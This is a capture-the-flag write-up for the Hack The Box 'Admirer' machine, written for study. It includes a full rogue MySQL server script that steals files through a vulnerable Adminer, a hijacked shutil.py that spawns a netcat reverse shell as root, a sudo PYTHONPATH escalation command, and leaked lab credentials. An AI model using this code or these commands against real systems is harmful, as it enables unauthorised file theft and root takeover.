Hackthebox: Admirer Writeup

Here’s my writeup for the Admirer Hackthebox Linux machine. It’s an interesting challenge and I learnt a couple of new things along the way. The password for the protected content is the root hash from /etc/shadow, in the following format: M5g******************************f10

I start off by doing the basic port and service enumeration.

$ nmap -sC -sV -v -p- --min-rate=10000
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
| 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Admirer
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

So the server runs FTP, SSH and an HTTP server. For the HTTP server, nmap flags a robots.txt with one disallowed entry, so let’s check that out. The default index.php seems fine and doesn’t have anything exploitable, so I move on to the next two items.

$ curl
User-agent: *
This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
Disallow: /admin-dir

I then tried accessing /admin-dir but got a 403 Forbidden. A 403 on the directory only blocks the listing, though: files inside it can still be fetched by name. The robots.txt comment mentions contacts and creds, so I guessed the filenames. contacts.txt and credentials.txt both exist, and the latter gives us a set of service credentials (FTP, WordPress, internal mail). Since the FTP service is accessible, let’s try that.

ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 3405 Dec 02 21:24 dump.sql
-rw-r--r-- 1 0 0 5270987 Dec 03 21:20 html.tar.gz

Inside the tarball is a backup of the web root. I found a set of MySQL connection credentials in index.php.

$servername = "localhost";
$username = "waldo";
$password = "]F7jLHw:*G>UPrTo}~A\"d6b";  // the password itself contains a double quote, so it is escaped in the PHP literal
$dbname = "admirerdb";

There’s also a utility-script folder with some interesting files, including another set of credentials in db_admin.php. I tried both sets of credentials on SSH, but neither worked. Of the four files in the backup, only three remain on the web server, so the site has probably changed since the backup was taken. Checking the missing file shows a TODO saying it might be replaced by an open source database management tool; a Google search for that turns up Adminer. Mental note to check further. We also now know that the server has a set of admin tasks that can be run, but on inspection there’s no way to turn them into a web shell from the web side.

So I tried accessing adminer.php and got the login page. Googling for vulnerabilities and exploits shows that the version deployed here is vulnerable to a file-read attack: if Adminer is pointed at a MySQL server the attacker controls, that server can answer any query with a LOAD DATA LOCAL INFILE request, and the PHP MySQL client will read the named local file and send its contents to the attacker.

Since we had two sets of SQL creds from earlier, I tried them on the Adminer login for good measure, but they failed.

I then set up my own SQL server to try reading files as described in https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool, but could not get /etc/passwd. Files under the web root were a different story: I was able to read index.php, which contains a new SQL password for waldo. The pattern (web root readable, /etc/passwd not) points to the PHP process being confined to the web directory; an open_basedir restriction is the usual cause, though that was not confirmed here.
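The rogue server side of that attack, as an added example written for this writeup (it is not the box’s code, Adminer’s code, or the Foregenix proof of concept). It speaks just enough of the MySQL client/server protocol to greet the client, accept any login, and answer the first query with a LOCAL INFILE request; the client then streams back the file named in that request. The listen address and port, the requested path (/var/www/html/index.php, the file that worked above), and the assumption that the connecting client has local-infile enabled are all illustrative choices.

```python
#!/usr/bin/env python3
"""Minimal rogue MySQL server for the Adminer file-read technique.

Added example for this writeup (not the box's code, not Adminer's, not the
Foregenix PoC).  Packet layouts follow the MySQL client/server protocol; the
listen address, port, requested path and the assumption that the client has
local-infile enabled are illustrative.
"""
import socket
import struct

# MySQL capability / status bits (only the ones this server needs).
CLIENT_LONG_PASSWORD = 0x00000001
CLIENT_LONG_FLAG = 0x00000004
CLIENT_CONNECT_WITH_DB = 0x00000008
CLIENT_LOCAL_FILES = 0x00000080       # "server supports LOAD DATA LOCAL"
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SECURE_CONNECTION = 0x00008000
SERVER_STATUS_AUTOCOMMIT = 0x0002
SERVER_CAPS = (CLIENT_LONG_PASSWORD | CLIENT_LONG_FLAG | CLIENT_CONNECT_WITH_DB
               | CLIENT_LOCAL_FILES | CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION)


def packet(seq, payload):
    """Frame a payload: 3-byte little-endian length, 1-byte sequence id, payload."""
    return len(payload).to_bytes(3, "little") + bytes([seq & 0xFF]) + payload


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf


def read_packet(sock):
    """Read one framed packet; returns (seq, payload), or (None, b'') on EOF."""
    hdr = _recv_exact(sock, 4)
    if len(hdr) < 4:
        return None, b""
    return hdr[3], _recv_exact(sock, int.from_bytes(hdr[:3], "little"))


def handshake_v10(server_version=b"5.7.29", conn_id=1, salt=b"A" * 20):
    """Protocol::HandshakeV10 greeting (seq 0) that advertises CLIENT_LOCAL_FILES."""
    body = b"\x0a"                                        # protocol version 10
    body += server_version + b"\x00"                      # server version, NUL-terminated
    body += struct.pack("<I", conn_id)                    # connection id
    body += salt[:8] + b"\x00"                            # auth-plugin-data part 1, filler
    body += struct.pack("<H", SERVER_CAPS & 0xFFFF)       # capability flags, lower 16 bits
    body += b"\x21"                                       # charset 33 = utf8_general_ci
    body += struct.pack("<H", SERVER_STATUS_AUTOCOMMIT)   # status flags
    body += struct.pack("<H", SERVER_CAPS >> 16)          # capability flags, upper 16 bits
    body += b"\x00"                                       # auth-plugin-data length (no PLUGIN_AUTH)
    body += b"\x00" * 10                                  # reserved
    body += salt[8:20] + b"\x00"                          # auth-plugin-data part 2 (13 bytes)
    return packet(0, body)


def ok_packet(seq):
    """OK_Packet: 0x00, affected rows 0, last insert id 0, status flags, warnings."""
    return packet(seq, b"\x00\x00\x00" + struct.pack("<HH", SERVER_STATUS_AUTOCOMMIT, 0))


def local_infile_request(seq, path):
    """LOCAL INFILE Request: 0xFB then the file name the *client* should read and send."""
    return packet(seq, b"\xfb" + path)


def collect_file(sock):
    """Gather the file the client streams back: data packets, then an empty packet.

    Returns (contents, last_seq); last_seq is needed to number the final OK.
    """
    data, last_seq = b"", 0
    while True:
        seq, payload = read_packet(sock)
        if seq is None or payload == b"":
            return data, (seq if seq is not None else last_seq)
        data, last_seq = data + payload, seq


def serve_once(bind="0.0.0.0", port=3306, path=b"/var/www/html/index.php"):
    """Accept one client and answer its first query with the infile request."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind, port))
        srv.listen(1)
        conn, _ = srv.accept()
        with conn:
            conn.sendall(handshake_v10())
            seq, _login = read_packet(conn)           # HandshakeResponse41; any creds accepted
            if seq is None:
                return b""
            conn.sendall(ok_packet(seq + 1))
            seq, _query = read_packet(conn)           # first COM_QUERY, whatever Adminer sends
            if seq is None:
                return b""
            conn.sendall(local_infile_request(seq + 1, path))
            contents, last_seq = collect_file(conn)
            conn.sendall(ok_packet(last_seq + 1))
            return contents


if __name__ == "__main__":
    print(serve_once().decode(errors="replace"))
```

Run it on the attacking machine, then log in through adminer.php with the server field set to that machine’s address and any username and password; the file lands on stdout. The query the client sends does not matter, which is the whole problem: the client trusts the server’s request for a local file rather than checking that it asked for one.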

The new credentials work on adminer.php, but there’s not much we can do from there. Thanks to password reuse they also work for SSH as waldo, and that gives us the user flag.

Root Flag

Now for some basic exploration and enumeration of the box with LinEnum.sh.

Waldo has sudo access to run /opt/scripts/admin_tasks.sh, which is the admin task script found earlier. It offers some tasks that couldn’t be run from the web server, and here they run as root. Task 6 is particularly interesting: it calls another Python script, and that script imports shutil. Because Python resolves imports by walking sys.path in order, a module of the same name placed in a directory that is searched before the standard library gets loaded instead, so the import looks hijackable. Some googling turned up this post, which was rather useful: https://rastating.github.io/privilege-escalation-via-python-library-hijacking/

One piece of the puzzle was still missing: how do I set the environment for sudo? With the default env_reset, sudo strips variables like PYTHONPATH, so exporting it in the shell does nothing. It turns out the variable can be passed directly on the sudo command line as VAR=value; sudo only accepts that when the matching sudoers rule carries the SETENV tag (or the command is ALL), which sudo -l will show. Now I can do a test: I create my own shutil.py, point PYTHONPATH at its directory and call the script again.

# /home/waldo/.nano/shutil.py - shadows the standard library module once its directory is on PYTHONPATH
import os

def make_archive(a, b, c):
    # called as root by the backup script; connect back to our listener on port 4444
    os.system('nc 4444 -e /bin/bash')

sudo PYTHONPATH=/home/waldo/.nano/ /opt/scripts/admin_tasks.sh

Start a listener on port 4444 (nc -lvnp 4444), then pick task 6: the backup script runs as root, imports our shutil.py instead of the real one, and spawns a reverse shell back to our machine as root. The -e flag needs a netcat build that supports it.
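To see the mechanism behind the sudo PYTHONPATH trick without a reverse shell, here is an added example written for this writeup (not code from the box or from the linked post). It drops a rogue shutil.py into a temporary directory, runs a stand-in for the backup script with and without that directory on PYTHONPATH, and reports which shutil was actually imported; the rogue module only records that it was loaded. It also lists the sys.path entries the current user can write to, which is the check worth running on a target before looking for a root-run Python script to hijack. The temporary directory, the stand-in victim script and the HIJACKED marker are assumptions of the example.

```python
#!/usr/bin/env python3
"""Demonstrates why `sudo PYTHONPATH=... /opt/scripts/admin_tasks.sh` works.

Added example for this writeup, not code from the box.  The rogue module below
only records that it was imported; the writeup's version spawned a reverse
shell instead.  The rogue module, victim script and marker are illustrative.
"""
import os
import subprocess
import sys
import tempfile
import textwrap

# Rogue shutil.py.  Its directory goes on PYTHONPATH, and PYTHONPATH entries sit
# in sys.path ahead of the standard library, so `import shutil` resolves to it.
ROGUE_SHUTIL = textwrap.dedent("""\
    HIJACKED = True

    def make_archive(base_name, fmt, root_dir=None, *args, **kwargs):
        # The backup script calls shutil.make_archive as root; this is where a
        # payload would run.  The benign stand-in just reports which file answered.
        return "make_archive handled by " + __file__
""")

# Stand-in for the Python backup script that admin_tasks.sh task 6 runs as root.
VICTIM = "import shutil; print(shutil.__file__); print(getattr(shutil, 'HIJACKED', False))"


def run_victim(pythonpath=None):
    """Run the victim with the given PYTHONPATH; return (shutil path, hijacked?)."""
    env = {k: v for k, v in os.environ.items() if k != "PYTHONPATH"}
    if pythonpath is not None:
        env["PYTHONPATH"] = pythonpath
    out = subprocess.run([sys.executable, "-c", VICTIM], env=env,
                         capture_output=True, text=True, check=True).stdout.splitlines()
    return out[0], out[1] == "True"


def demo():
    """Import shutil with and without the rogue directory on PYTHONPATH."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "shutil.py"), "w") as f:
            f.write(ROGUE_SHUTIL)
        clean_path, clean_hijacked = run_victim()
        rogue_path, rogue_hijacked = run_victim(d)
    return {"tmpdir": d, "clean_path": clean_path, "clean_hijacked": clean_hijacked,
            "rogue_path": rogue_path, "rogue_hijacked": rogue_hijacked}


def writable_search_dirs():
    """sys.path entries the current user can write to; any of them could host a
    module that shadows the standard library for scripts run by another user."""
    return [p for p in sys.path if p and os.path.isdir(p) and os.access(p, os.W_OK)]


if __name__ == "__main__":
    r = demo()
    print("without PYTHONPATH:", r["clean_path"], "hijacked:", r["clean_hijacked"])
    print("with PYTHONPATH:   ", r["rogue_path"], "hijacked:", r["rogue_hijacked"])
    print("writable sys.path entries:", writable_search_dirs())
```

The same precedence applies when the script runs under sudo: sudo does not change how Python searches for modules, it only decides whether PYTHONPATH survives into the root process, which is why the SETENV tag on the sudoers rule is the enabling condition.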